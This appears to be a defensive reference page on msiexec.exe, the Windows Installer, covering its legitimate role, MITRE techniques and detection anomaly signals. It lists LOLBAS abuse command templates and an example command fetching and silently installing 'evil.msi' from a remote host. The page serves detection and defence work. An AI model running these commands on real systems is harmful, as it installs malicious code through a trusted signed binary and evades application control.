Process

unknown

msiexec.exe

msiexec.exe is the Windows Installer, the engine that installs, repairs, and removes software packaged as MSI files. It runs constantly and legitimately whenever software is installed or updated. Attackers abuse it to install malicious packages and to run a remote MSI or DLL through a trusted, signed binary.

CategoryUtilityTagsmicrosoftcore-windowslolbin

File identity

File details

Not observed.

Signing information

Not observed.

File version0

Not observed.

File size0

Not observed.

Execution context

File paths0

Not observed.

User context0

Not observed.

Integrity level0

Not observed.

Instances0

Not observed.

Session0

Not observed.

Token privileges0

Not observed.

Ancestry

Parents0

Not observed.

Children0

Not observed.

Grandparents0

Not observed.

Grandchildren0

Not observed.

Behavior

Loaded modules0

Not observed.

Named pipes0

Not observed.

Process handles0

Not observed.

Command-line patterns0

Not observed.

LOLBAS5
  • msiexec /quiet /i {PATH:.msi}Execute · Execute custom made msi file with attack code
  • msiexec /q /i {REMOTEURL}Execute · Execute custom made msi file with attack code from remote server
  • msiexec /y {PATH_ABSOLUTE:.dll}Execute · Execute dll files
  • msiexec /z {PATH_ABSOLUTE:.dll}Execute · Execute dll files
  • msiexec /i {PATH_ABSOLUTE:.msi} TRANSFORMS="{REMOTEURL:.mst}" /qbExecute · Install trusted and signed msi file, with additional attack code as transformation file, from a remote server

View LOLBAS entry

Indicators

Hashes

Not observed.

Analysis

About this process

msiexec.exe processes Windows Installer packages (.msi) and patches (.msp), carrying out the install, repair, and uninstall actions they define. It can install from a local file or directly from a URL, and a package can include custom actions that run programs or scripts as part of installation. The genuine binary lives at C:\Windows\System32\msiexec.exe, and it runs both as a per-invocation client and as the long-running Windows Installer service.

Legitimately, msiexec is one of the most common ways software is installed and updated, so the process itself is unremarkable. The package it is handed, where that package came from, and any custom action it runs are what give an instance meaning.

Security notes

msiexec.exe is a system-binary proxy and a software-deployment vector (T1218.007). Because a package can run custom actions and msiexec will install straight from a URL, an attacker runs msiexec /i https://host/evil.msi /qn to fetch and silently install a malicious package, or wraps a payload DLL or script in an MSI's custom actions, all under a trusted, signed Microsoft process that application-control rules tend to allow (T1105).

Because legitimate installs look similar, the context is what matters: an MSI pulled from a URL or a temp folder, a silent install (/qn) launched by an Office document or a script host, or msiexec spawning a shell. A normal software update does none of those.

Anomaly signals5
  • Image path other than C:\Windows\System32\msiexec.exehigh
  • Installing a package directly from a URL (msiexec /i https://...)high
  • Parent is an Office application, a script host, or an unfamiliar processhigh
  • msiexec spawning a shell or making unexpected outbound connectionshigh
  • A package in a user-writable path (Temp, AppData, Downloads)med

Telemetry

OS prevalence0

Not observed.

Observation timeline

Not observed.

References

Subsearch

Hasbeen seen inof msiexec.exe?
Edit this page on GitHub